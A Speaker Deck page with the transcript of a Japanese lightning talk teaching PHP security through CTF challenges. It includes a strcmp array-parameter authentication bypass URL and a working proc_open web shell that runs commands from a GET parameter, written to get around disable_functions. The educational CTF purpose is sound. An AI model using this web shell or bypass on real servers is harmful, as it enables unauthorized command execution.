Upgrade to Pro — share decks privately, control downloads, hide ads and more …

CTFで学ぶPHPセキュリティ

Sponsored · Your Podcast. Everywhere. Effortlessly. Share. Educate. Inspire. Entertain. You do you. We'll handle the rest.
Avatar for Ryoto Saito Ryoto Saito
March 31, 2019
Programming
4.2k
3

 CTFで学ぶPHPセキュリティ

PHPerKaigi 2019
ルーキーズLT

Avatar for Ryoto Saito

Ryoto Saito

March 31, 2019

More Decks by Ryoto Saito

See All by Ryoto Saito
コンテナ上シェル悪用の話とPure Bashでcurlが作れた話
Avatar for Ryoto Saito ryotosaito
2
670
シェル芸のせかい / the Shellgei World
Avatar for Ryoto Saito ryotosaito
2
1.8k

Other Decks in Programming

See All in Programming
Hunting Vulnerabilities in Symfony with LLMs
Avatar for Vincent Amstoutz vinceamstoutz
0
550
OSもどきOS
Avatar for Sora Arakawa arkw
0
570
「AIで開発し、AIを届ける」をEvalでつなぐ 〜AIネイティブに始めるプロダクト開発の実践〜 / Connecting "Develop with AI, deliver AI" with Eval
Avatar for r-kagaya rkaga
4
5.3k
Java × distroless で 軽量なコンテナイメージを / Java on Distroless
Avatar for Daisuke Garaike contour_gara
0
550
ふつうのFeature Flag実践入門
Avatar for irof irof
8
4.1k
LLMによるContent Moderationの本番運用の裏側と品質担保への挑戦
Avatar for suikabar suikabar
3
710
Semantic Version 単位で戦略を柔軟に変えて、パッケージアップデートを自動化する
Avatar for daitasu daitasu
1
260
生成AI時代にこそ効くGo | Why Go Works in the Age of Generative AI
Avatar for mom0tomo mom0tomo
8
3.3k
ユニットテストの先へ:テスト技法で要求・仕様を整理するJava開発実践 / Beyond_Unit_Testing_Practical_Java_Development_Techniques_for_Organizing_Requirements_and_Specifications
Avatar for SHIMANE, Yoshikazu shimashima35
0
410
TAKTでAI駆動開発の品質を設計する
Avatar for かとじゅん j5ik2o
7
1.4k
Agentic UI
Avatar for Manfred Steyer manfredsteyer
PRO
0
180
「エンジニアインターン、どうやって取った?」準備のリアルを語るLT会 Progate BAR
Avatar for akio akiomatic
0
140

Featured

See All Featured
Mind Mapping
Avatar for Hélio Medeiros helmedeiros
PRO
1
250
Connecting the Dots Between Site Speed, User Experience & Your Business [WebExpo 2025]
Avatar for Tammy Everts tammyeverts
11
950
Measuring Dark Social's Impact On Conversion and Attribution
Avatar for Stephen Akadiri stephenakadiri
2
220
Redefining SEO in the New Era of Traffic Generation
Avatar for Szymon Słowik szymonslowik
1
340
Paper Plane
Avatar for Katie Cordina Lindsey katiecoart
PRO
1
51k
Bash Introduction
Avatar for André Augusto Costa Santos 62gerente
615
220k
Code Reviewing Like a Champion
Avatar for maltzj maltzj
528
40k
How to Align SEO within the Product Triangle To Get 
Buy-In & Support - #RIMC
Avatar for Aleyda Solis aleyda
2
1.5k
Art, The Web, and Tiny UX
Avatar for Lynn Fisher lynnandtonic
304
22k
A designer walks into a library…
Avatar for Paul Jervis Heath pauljervisheath
211
24k
The SEO Collaboration Effect
Avatar for Kristina Bergwall kristinabergwall1
1
490
[RailsConf 2023 Opening Keynote] The Magic of Rails
Avatar for Eileen M. Uchitelle eileencodes
31
10k

Transcript

  1. CTFで学ぶ PHPセキュリティ 2019/3/31 PHPerKaigi ルーキーズLT Ryoto (@systemctl_ryoto) 1

  2. CTF - Capture the Flag 2

  3. CTF Capture the Flag • FPSのゲームルール の1種 • 敵陣のフラッグを自陣 に持ち帰る

    • 由来は物理的な遊び • 転じて… 3

  4. CTF Capture the Flag • 情報セキュリティ的に脆弱な 「何か」が用意される • その脆弱性を突いてFlagを取得 する競技

    ※ Flag = 仮想的な機密文字列 flag{PHP_is_s3cur3!} ↑過去に本当に見たことあるやつ • 問題ベースで楽しくセキュリティ が勉強できる! • 徳丸さんの挑戦状もCTF 4

  5. PHPer チャレンジ は シェルを 奪えます ls -al /もmysqldumpも実行できる 5

  6. CTFの 主要な ジャンル 厳密な分類は大会やサイトによって 微妙に異なる 6 Pwn プログラムの脆弱性を突く Reverse リバースエンジニアリング

    Forensic パケットやFile systemなど Crypto 暗号解読 Web クライアントからサーバまで

  7. Webの CTF 情報セキュリティ的に脆弱な「何か」 • 「Webサイト」 • 「ソースコード」 どこが脆弱かはもちろん、どこにFlag があるのかがわからないことも たのしい謎解きの始まり

    7

  8. CTFのPHP問題例 - 実際の問題の一部分 - 8

  9. 前提:パスワード認証のソースを入手した include "define.php"; /* 403 Forbidden */ if (strcmp($_GET['password'], PASSWORD)

    == 0) { echo FLAG; } 目標:なんとか突破したい! 言語仕様に関する問題 9

  10. 前提:パスワード認証のソースを入手した include "define.php"; /* 403 Forbidden */ if (strcmp($_GET['password'], PASSWORD)

    == 0) { echo FLAG; } 目標:なんとか突破したい! 言語仕様に関する問題 10

  11. 言語仕様に関する問題 11

  12. 言語仕様に関する問題 12

  13. 言語仕様に関する問題 13 if (strcmp($_GET['password'], PASSWORD) == 0) strcmpは配列や関数などを受け取るとnull+Warningを返す) <?php var_dump($_GET);

    http://localhost/dump.php?password[]=admin にアクセス↓ array(1) { ["password"] => array(1) { [0] => string(5) "admin" } }

  14. include "define.php"; /* 403 Forbidden */ if (strcmp($_GET['password'], PASSWORD) ==

    0) { echo FLAG; } 目標:なんとか突破したい! 先ほどのヒントを踏まえると… 言語仕様に関する問題 14

  15. include "define.php"; /* 403 Forbidden */ if (strcmp($_GET['password'], PASSWORD) ==

    0) { echo FLAG; } 目標:なんとか突破したい! Ans: http://target.host/?password[]= 言語仕様に関する問題 15

  16. 前提:任意の.phpファイルがUpload、実行できる脆弱性が発覚 <?php phpinfo(); disable_functions pcntl_exec, exec, popen, passthru, shell_exec, system

    目的:シェルを奪いたい!(任意コマンドを実行したい) 任意コード実行 16

  17. (注:shell_execと等価なので`cmd`はダメ) 任意コード実行 17

  18. pcntl_exec, exec, popen, passthru, shell_exec, system... proc_open関数がノーマーク 任意コード実行 18

  19. pcntl_exec, exec, popen, passthru, shell_exec, system... proc_open関数がノーマーク 前提:任意の.phpファイルがUpload、実行できる脆弱性が発覚 目的:シェルを奪いたい!(任意コマンドを実行したい) 任意コード実行

    19

  20. Ans. 以下のPHPファイルをアップロード <?php $cmd = $_GET['cmd'] $process = proc_open($cmd, [1=>["pipe",

    "w"]], $pipes); echo stream_get_contents($pipes[1]); これを1回アップロードすれば?cmd=...でやりたい放題 任意コード実行 20

  21. CTFに興味が湧いてきた人は! 21

  22. やってみよう! 22 常設CTF(Web・PHP問題が入門から充実している) • https://www.root-me.org/en/Challenges/Web-Server/ • http://websec.fr/ ※ 垢登録するときは捨てパスワードを使いましょう 慣れたらコンテストに参加!

    • https://ctftime.org

  23. 困ったときは 23 CTFでは解答例のことを Write-up と呼びます。 考えてもわからなかったら答えを探すのもあり! ("Write-up"で検索して問題を探す荒技もあり)

  24. Thank you! @systemctl_ryoto 24